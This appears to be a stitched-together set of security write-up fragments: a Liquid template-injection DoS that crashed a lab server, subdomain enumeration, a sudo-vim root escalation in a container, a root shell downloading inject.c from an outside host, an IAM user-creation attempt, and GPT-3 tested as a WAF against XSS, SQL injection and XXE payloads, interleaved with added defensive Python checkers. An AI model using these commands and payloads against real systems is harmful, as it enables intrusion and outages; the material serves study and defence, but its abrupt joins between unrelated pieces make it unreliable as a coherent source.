We just published a detailed analysis of #CVE-2023-3519, which we previously wrote about. Today, we’re going even further into how this #RCE vulnerability can be exploited.
Rank 8, 605 pt - Possible privilege escalation vulnerability in the Linux kernel (CVE-2023-0386)
Repositories: 8 / Stars: 525
An attacker who has already gained access to a vulnerable Linux system with an ordinary user account can escalate to root privileges.
CVE-2023-0386: a flaw in the Linux kernel's OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.
$ cat results.json | head -n 20
[
{
"plugin": "networkAccessDefaultAction",
"category": "Storage Accounts",
"title": "Network Access Default Action",
"description": "Ensures that Storage Account access is restricted to trusted networks",
"resource": "N/A",
"region": "eastus",
"status": "OK",
"message": "No storage accounts found",
"compliance": "PCI: PCI requires data access to be configured to use a firewall. Removing the default network access action enables a more granular level of access controls."
},
(remainder omitted)
# time curl 'http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..10%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
hi
real 0m0.018s
1,000 iterations → 0.023 seconds
# time curl 'http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..1000%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
hi
real 0m0.023s
1,000,000 iterations → 6.387 seconds
# time curl 'http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..1000000%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
hi
real 0m6.387s
100,000,000 iterations → 1 min 5.994 s
# time curl 'http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..10000000%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
hi
real 1m5.994s
Let's check the load on the server with the top command. It reports "%Cpu(s): 99.3 us", which confirms that the server is under load.
top - 08:30:47 up 31 min, 2 users, load average: 0.59, 0.53, 0.26
Tasks: 115 total, 1 running, 69 sleeping, 0 stopped, 0 zombie
%Cpu(s): 99.3 us, 0.7 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 2006252 total, 1560000 free, 249416 used, 196836 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 1614816 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2806 root 20 0 319712 111484 8452 S 99.3 5.6 0:04.44 ruby
Crashing the system with a massive loop
Next, we check whether the system can be brought down by increasing the loop count even further.
1. Terminal (target)
Start the server.
# docker-compose up
[+] Running 1/0
⠿ Container liquid-erb-ssti-app-1 Created
Attaching to liquid-erb-ssti-app-1
liquid-erb-ssti-app-1 | [2023-07-15 08:32:36] INFO WEBrick 1.6.1
liquid-erb-ssti-app-1 | [2023-07-15 08:32:36] INFO ruby 2.7.8 (2023-03-30) [x86_64-linux]
liquid-erb-ssti-app-1 | == Sinatra (v3.0.6) has taken the stage on 4567 for development with backup from WEBrick
liquid-erb-ssti-app-1 | [2023-07-15 08:32:36] INFO WEBrick::HTTPServer#start: pid=7 port=4567
2. Terminal (attacker)
Inject a template with a larger loop count than in the previous test.
# curl 'http://xxx.yyy.zzz.221:4567/liquid?name=%7B%25+for+i+in+%281..10000000000%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
curl: (52) Empty reply from server
3. Terminal (target)
After a while, the server died.
liquid-erb-ssti-app-1 | Killed
liquid-erb-ssti-app-1 exited with code 137
This confirms that the system can be brought down by a DoS delivered through server-side template injection.
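The root cause above is that the `name` parameter is concatenated into the Liquid template source, so a user can supply tags and not just data. The following added example (not code from the original post or from the Liquid project) shows the two guards a defender would put in front of the renderer: reject template syntax outright when the parameter is supposed to be plain data, and, for applications that knowingly accept user templates, bound the loop work before rendering. The `/liquid?name=` URLs are the payloads the post sends with curl; the iteration budget, the function names and the two policies are this example's own choices.

```python
"""Pre-render guard for user-supplied strings that reach a Liquid renderer."""
import re
from urllib.parse import urlsplit, parse_qs

# Liquid output/tag delimiters. A user *value* containing them is being
# treated as template source: that is the injection the post demonstrates.
LIQUID_SYNTAX = re.compile(r"\{\{|\{%")

# {% for i in (1..1000000) %}  -> both bounds of a literal numeric range
FOR_RANGE = re.compile(
    r"\{%-?\s*for\s+\w+\s+in\s*\(\s*(-?\d+)\s*\.\.\s*(-?\d+)\s*\)", re.I)

MAX_ITERATIONS = 10_000  # constructed budget; tune to the app's render time budget

# The post's own payloads (10 iterations: 0.018 s, 1,000,000: 6.387 s,
# 10,000,000,000: the container was OOM-killed). Host replaced by 127.0.0.1.
URL_10 = ("http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..10%29+%25%7D"
          "%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D")
URL_1M = ("http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..1000000%29+%25%7D"
          "%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D")
URL_10G = ("http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..10000000000%29+%25%7D"
           "%0D%0A%7B%25+assign+hoge+%3D+i+%25%7D%0D%0A%7B%25+endfor+%25%7D")


def user_value(url, param="name"):
    """Decoded value of one query parameter, as the Sinatra app's params[] sees it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [""])[0]


def loop_budget(source):
    """Worst-case iteration count of the literal-range for loops in `source`.

    Every loop is treated as nested inside the previous one (product), so the
    estimate is exact for nested loops and conservative for sequential ones.
    Returns 0 when the source contains no literal-range loop at all."""
    counts = [max(0, int(hi) - int(lo) + 1) for lo, hi in FOR_RANGE.findall(source)]
    total = 1
    for count in counts:
        total *= count
    return total if counts else 0


def check_as_data(value):
    """Policy for apps like the post's: `name` is data, never template source.

    Returns (allowed, reason). The fix inside the app is to render a fixed
    template containing {{ name }} and pass the value in the assigns hash."""
    if LIQUID_SYNTAX.search(value):
        return False, "template syntax in user data (possible SSTI)"
    return True, "plain data"


def check_as_template(source, max_iterations=MAX_ITERATIONS):
    """Policy for apps that knowingly accept user templates: bound the work
    before the renderer spends CPU on it."""
    budget = loop_budget(source)
    if budget > max_iterations:
        return False, f"loop budget {budget} exceeds {max_iterations}"
    return True, f"loop budget {budget}"


if __name__ == "__main__":
    for url in (URL_10, URL_1M, URL_10G):
        value = user_value(url)
        print(check_as_data(value), check_as_template(value))
```

The static loop bound only covers literal ranges; a template that loops over a large collection needs a runtime limit as well, which is what Liquid's own resource limits (render score and output length limits) are for, and which the Sinatra app in the post does not configure. Neither guard is a substitute for the first policy: if the parameter is meant to be a name, it should never be parsed as a template.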
# ./subfinder -d motikan2010.com -v
__ _____ __
_______ __/ /_ / __(_)___ ____/ /__ _____
/ ___/ / / / __ \/ /_/ / __ \/ __ / _ \/ ___/
(__ ) /_/ / /_/ / __/ / / / / /_/ / __/ /
/____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/
projectdiscovery.io
[INF] Current subfinder version v2.6.0 (latest)
[INF] Loading provider config from /root/.config/subfinder/provider-config.yaml
[DBG] Selected source(s) for this search: anubis, fofa, riddler, censys, crtsh, fullhunt, whoisxmlapi, certspotter, chinaz, digitorus, quake, virustotal, bufferover, chaos, dnsrepo, hackertarget, bevigil, leakix, shodan, hunter, intelx, passivetotal, securitytrails, c99, dnsdumpster, alienvault, robtex
[INF] Enumerating subdomains for motikan2010.com
[DBG] Cannot use the whoisxmlapi source because there was no API key/secret defined for it.
[DBG] Cannot use the passivetotal source because there was no API key/secret defined for it.
[DBG] Cannot use the securitytrails source because there was no API key/secret defined for it.
[DBG] Cannot use the intelx source because there was no API key/secret defined for it.
[DBG] Cannot use the shodan source because there was no API key/secret defined for it.
[DBG] Cannot use the certspotter source because there was no API key/secret defined for it.
[DBG] Cannot use the quake source because there was no API key/secret defined for it.
[DBG] Cannot use the virustotal source because there was no API key/secret defined for it.
[DBG] Cannot use the bevigil source because there was no API key/secret defined for it.
[DBG] Cannot use the leakix source because there was no API key/secret defined for it.
[DBG] Cannot use the hunter source because there was no API key/secret defined for it.
[DBG] Cannot use the c99 source because there was no API key/secret defined for it.
[DBG] Cannot use the fofa source because there was no API key/secret defined for it.
[DBG] Cannot use the robtex source because there was no API key/secret defined for it.
[DBG] Cannot use the censys source because there was no API key/secret defined for it.
[DBG] Cannot use the fullhunt source because there was no API key/secret defined for it.
[DBG] Cannot use the dnsrepo source because there was no API key/secret defined for it.
[DBG] Cannot use the chaos source because there was no API key/secret defined for it.
[DBG] Cannot use the chinaz source because there was no API key/secret defined for it.
[DBG] Cannot use the bufferover source because there was no API key/secret defined for it.
[DBG] Response for failed request against https://jonlu.ca/anubis/subdomains/motikan2010.com:
[]
[WRN] Could not run source anubis: unexpected status code 300 received from https://jonlu.ca/anubis/subdomains/motikan2010.com
[digitorus] motikan2010.com
[alienvault] blog.motikan2010.com
[alienvault] www.motikan2010.com
[DBG] Response for failed request against https://riddler.io/search?q=pld:motikan2010.com&view_type=data_table:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>403 ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
Request blocked.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
<BR clear="all">
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: 43OkGZsMblidN8c685tqsQfTqu5FTpj6M4DOIxOLhlQH2yuJrMqe3A==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
[WRN] Could not run source riddler: unexpected status code 403 received from https://riddler.io/search?q=pld:motikan2010.com&view_type=data_table
[leakix] blog.motikan2010.com
[leakix] www.motikan2010.com
[hackertarget] namatube.motikan2010.com
[hackertarget] mymacmate.motikan2010.com
[hackertarget] md-to-pdf.motikan2010.com
[hackertarget] once-tech.motikan2010.com
[hackertarget] chosensya-maker.motikan2010.com
[hackertarget] hacker-trends.motikan2010.com
[dnsdumpster] namatube.motikan2010.com
[dnsdumpster] mymacmate.motikan2010.com
[dnsdumpster] md-to-pdf.motikan2010.com
[dnsdumpster] once-tech.motikan2010.com
[dnsdumpster] chosensya-maker.motikan2010.com
[dnsdumpster] hacker-trends.motikan2010.com
[crtsh] www.motikan2010.com
[crtsh] blog.motikan2010.com
[crtsh] motikan2010.com
[crtsh] dev.motikan2010.com
[crtsh] pre.motikan2010.com
[crtsh] stg2.motikan2010.com
[crtsh] stg.motikan2010.com
[crtsh] sample.motikan2010.com
dev.motikan2010.com
pre.motikan2010.com
stg.motikan2010.com
blog.motikan2010.com
namatube.motikan2010.com
md-to-pdf.motikan2010.com
sample.motikan2010.com
www.motikan2010.com
chosensya-maker.motikan2010.com
hacker-trends.motikan2010.com
stg2.motikan2010.com
motikan2010.com
mymacmate.motikan2010.com
once-tech.motikan2010.com
[INF] Found 14 subdomains for motikan2010.com in 7 seconds 674 milliseconds
$ curl -m 5 http://169.254.169.254/latest/meta-data/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
curl: (28) Connection timed out after 5000 milliseconds
The metadata service could not be reached either.
Checking capabilities (www-data user)
Use the capsh command to check which capabilities are enabled.
The "Current: =" field is empty, which confirms that this user does not have sufficient privileges.
$ capsh --print
Current: =
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=33(www-data) euid=33(www-data)
gid=33(www-data)
groups=33(www-data)
Guessed mode: UNCERTAIN (0)
Obtaining root inside the container
Now we try to obtain a root shell inside the container.
First we tried whether we could become root with the sudo su command, but that did not work.
$ sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required
Checking the commands that can be run with sudo
Run sudo -l to list the commands the current user is allowed to run with sudo.
$ sudo -l
Matching Defaults entries for www-data on 533e4e3fac01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on 533e4e3fac01:
(root) NOPASSWD: /usr/bin/vim /var/www/html/documents
$ sudo /usr/bin/vim /var/www/html/documents
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal
E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
builtin_amiga
builtin_ansi
builtin_pcansi
builtin_win32
builtin_vt320
builtin_vt52
builtin_xterm
builtin_iris-ansi
builtin_debug
builtin_dumb
defaulting to 'ansi'
capsh --print
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)
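The rule `(root) NOPASSWD: /usr/bin/vim /var/www/html/documents` is what turned www-data into root: an interactive editor running as root can execute commands from inside, so restricting the file argument changes nothing. The following added example (not the post's code) audits `sudo -l` output for exactly this class of rule; `SUDO_L_OUTPUT` is the listing the post obtained, while the set of shell-capable programs, the messages and the function names are this example's own choices.

```python
"""Audit `sudo -l` output for rules that amount to an unrestricted root shell."""
import os
import re
import shlex

# The post's own `sudo -l` listing (raw string so the \: escapes survive).
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on 533e4e3fac01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on 533e4e3fac01:
    (root) NOPASSWD: /usr/bin/vim /var/www/html/documents"""

# One command specification: "(runas) TAG: TAG: command args"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Interactive programs that can execute arbitrary commands from inside.
# Allowing any of them as root via sudo is equivalent to allowing a root
# shell; for editors, sudo's own manual recommends sudoedit instead.
EDITORS = {"vim", "vi", "view", "nano", "emacs"}
SHELL_CAPABLE = EDITORS | {"less", "more", "bash", "sh", "dash", "zsh", "python3", "perl"}


def parse_sudo_l(text):
    """Return the command rules from `sudo -l` output as dicts."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        m = RULE.match(line) if in_commands else None
        if m:
            rules.append({
                "runas": m.group("runas").strip(),
                "tags": re.findall(r"[A-Z]+", m.group("tags")),
                "command": m.group("cmd").strip(),
            })
    return rules


def audit_rule(rule):
    """List the problems with one rule; an empty list means nothing was flagged."""
    findings = []
    runas_user = rule["runas"].split(":")[0].strip()
    as_root = runas_user in ("root", "ALL")
    argv = shlex.split(rule["command"]) if rule["command"] != "ALL" else ["ALL"]
    prog = os.path.basename(argv[0])
    if rule["command"] == "ALL" and as_root:
        findings.append("ALL as root: unrestricted root")
    if "NOPASSWD" in rule["tags"]:
        findings.append(f"NOPASSWD: runs as {runas_user} without re-authentication")
    if as_root and prog in SHELL_CAPABLE:
        findings.append(f"{prog} can run arbitrary commands from inside; as root this is a root shell")
    if as_root and prog in EDITORS:
        findings.append("prefer sudoedit (sudo -e) so the editor itself runs as the invoking user")
    return findings


def audit(text):
    """(command, findings) for every rule in a `sudo -l` listing."""
    return [(r["command"], audit_rule(r)) for r in parse_sudo_l(text)]


if __name__ == "__main__":
    for command, findings in audit(SUDO_L_OUTPUT):
        print(command)
        for f in findings:
            print("  -", f)
```

Running it over the post's listing flags the vim rule three times (NOPASSWD, shell-capable program as root, and the sudoedit alternative). With `sudoedit /var/www/html/documents` the editor runs as www-data on a temporary copy and only the final write-back happens as root, which is the least-privilege shape of the same rule.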
root@533e4e3fac01:/# curl http://164.xxx.yyy.xxx/inject.c -o inject.c
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2185 100 2185 0 0 6207 0 --:--:-- --:--:-- --:--:-- 6189
An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:sts::364300000000:assumed-role/ecs-instance-role/i-00b41f7908dc8d792 is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::364300000000:user/hacker because no permissions boundary allows the iam:CreateUser action
To find the cause, let's look at the role's details.
Checking the details of the ecs-instance-role role (aws iam get-role)
Let's check the details of the role ecs-instance-role.
$ aws iam get-role --role-name ecs-instance-role
The role has a permissions boundary set to the policy "aws-goat-instance-boundary-policy", so we can infer that AWS IAM actions are being restricted.
That is presumably why creating the AWS user failed.
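The AccessDenied message above says "no permissions boundary allows the iam:CreateUser action": with a boundary attached, an action is effective only if both the identity policy and the boundary allow it. The following added example (not the post's code and not AWS's evaluation engine) reproduces that rule on constructed policy documents, since the post does not show the contents of the boundary policy. The role name, the boundary policy name and the error wording come from the post; the policy documents and the get-role output are constructed, and the account id 123456789012 is a placeholder.

```python
"""Why iam:CreateUser was denied: identity policy vs. permissions boundary."""
import fnmatch

ROLE_NAME = "ecs-instance-role"
BOUNDARY_NAME = "aws-goat-instance-boundary-policy"

# Constructed: what `aws iam get-role --role-name ecs-instance-role` returns,
# trimmed to the field that matters here. Account id is a placeholder.
GET_ROLE_OUTPUT = {"Role": {
    "RoleName": ROLE_NAME,
    "Arn": f"arn:aws:iam::123456789012:role/{ROLE_NAME}",
    "PermissionsBoundary": {
        "PermissionsBoundaryType": "Policy",
        "PermissionsBoundaryArn": f"arn:aws:iam::123456789012:policy/{BOUNDARY_NAME}",
    },
}}

# Constructed: a generous identity policy attached to the role ...
IDENTITY_POLICY = {"Statement": [
    {"Effect": "Allow", "Action": ["iam:*", "ecs:*", "s3:*"], "Resource": "*"}]}
# ... and a boundary that only covers what the ECS instance needs. It never
# grants iam:*, so no IAM action can be effective whatever the identity policy says.
BOUNDARY_POLICY = {"Statement": [
    {"Effect": "Allow", "Action": ["ecs:*", "s3:*", "ec2:Describe*"], "Resource": "*"}]}


def boundary_arn(get_role_output):
    """The boundary policy ARN from get-role output, or None if no boundary is set."""
    return get_role_output["Role"].get("PermissionsBoundary", {}).get("PermissionsBoundaryArn")


def _as_list(x):
    return x if isinstance(x, list) else [x]


def evaluate_policy(policy, action, resource="*"):
    """'Allow', 'Deny' or 'Implicit' for one policy document (explicit Deny wins)."""
    verdict = "Implicit"
    for stmt in policy.get("Statement", []):
        actions = _as_list(stmt.get("Action", []))
        if not any(fnmatch.fnmatchcase(action.lower(), a.lower()) for a in actions):
            continue
        resources = _as_list(stmt.get("Resource", "*"))
        if not any(fnmatch.fnmatchcase(resource, r) for r in resources):
            continue
        if stmt.get("Effect") == "Deny":
            return "Deny"
        verdict = "Allow"
    return verdict


def effective_decision(identity_policy, boundary_policy, action, resource="*"):
    """Combine the two documents the way IAM does for a principal with a boundary:
    the action must be allowed by BOTH, and an explicit Deny in either wins.
    Returns (decision, reason); the reason mirrors the CLI's AccessDenied wording."""
    ident = evaluate_policy(identity_policy, action, resource)
    bound = evaluate_policy(boundary_policy, action, resource) if boundary_policy else "Allow"
    if "Deny" in (ident, bound):
        return "Deny", "explicit deny"
    if ident != "Allow":
        return "Deny", f"no identity-based policy allows the {action} action"
    if bound != "Allow":
        return "Deny", f"no permissions boundary allows the {action} action"
    return "Allow", "allowed by the identity policy and within the boundary"


if __name__ == "__main__":
    print("boundary:", boundary_arn(GET_ROLE_OUTPUT))
    for action in ("iam:CreateUser", "s3:ListBucket", "ec2:DescribeInstances"):
        print(action, effective_decision(IDENTITY_POLICY, BOUNDARY_POLICY, action))
```

The simulation ignores service control policies, session policies and resource-based policies, each of which can deny as well. For a real role, `aws iam simulate-principal-policy` gives the authoritative answer; the point of the toy evaluator is only to make the "both must allow" rule behind the error message visible.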
no-port-forwarding,no-agent-forwarding,command="echo 'Please login as the user \"ubuntu\" rather than the user \"root\".';echo;sleep 10;exit 142" ssh-ed25519 AAAA...
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONTENT-LENGTH: 62
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=TEST%0D%0A&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
Below is the response from GPT-3.
No, this is not a cyber attack.
It is an HTTP request, which is a common way for computers to communicate with web servers.
XSS
GET parameter
GET:<script>alert(document.cookie)</script>
2.83 seconds
Detected
As expected, it was judged an attack and the request was blocked by the WAF!
The response also includes a summary: "it contains a script that tries to steal cookies".
Is the following HTTP request a cyber attack?
-----
GET /?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CONNECTION: keep-alive
HOST: 127.0.0.1
Yes, this HTTP request is a cyber attack.
It contains a malicious script that could be used to access and steal cookies from the user's browser.
Since it was judged an attack, a 403 error was returned as in the image below. It appears to behave as intended.
(Screenshots are omitted from here on.)
POST data
POST:<script>alert(document.cookie)</script>
2.98 seconds
Not detected
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONTENT-LENGTH: 105
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this is not a cyber attack. This is a normal HTTP request.
POST data, no headers
POST:<script>alert(document.cookie)</script>
6.88 seconds
Detected
When the header information was not sent to GPT-3, the request was detected.
Since the header information appears to act as noise, from here on we check the attack verdict both with and without headers.
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
msg=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
Yes, this is a cyber attack.
The request contains a malicious script that can be used to steal the user's cookies.
SQL injection
GET parameter
GET:1 OR SLEEP(25)=0 LIMIT 1--
3.75 seconds
Detected
Is the following HTTP request a cyber attack?
-----
GET /post?p=1%20OR%20SLEEP(25)=0%20LIMIT%201--%20 HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONNECTION: keep-alive
HOST: 127.0.0.1
Yes, this HTTP request is a cyber attack.
It is attempting to exploit a vulnerability in the application by using a SQL injection attack.
GET parameter, no headers
3.23 seconds
Detected
Is the following HTTP request a cyber attack?
-----
GET /post?p=1%20OR%20SLEEP(25)=0%20LIMIT%201--%20 HTTP/1.1
Yes, this HTTP request is a cyber attack. It is an example of a SQL injection attack,
which is a type of attack that attempts to inject malicious code into a database.
XXE
POST parameter (1)
POST:<!ENTITY xxe SYSTEM "file:///dev/random" >]>
8.01 seconds
Not detected
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
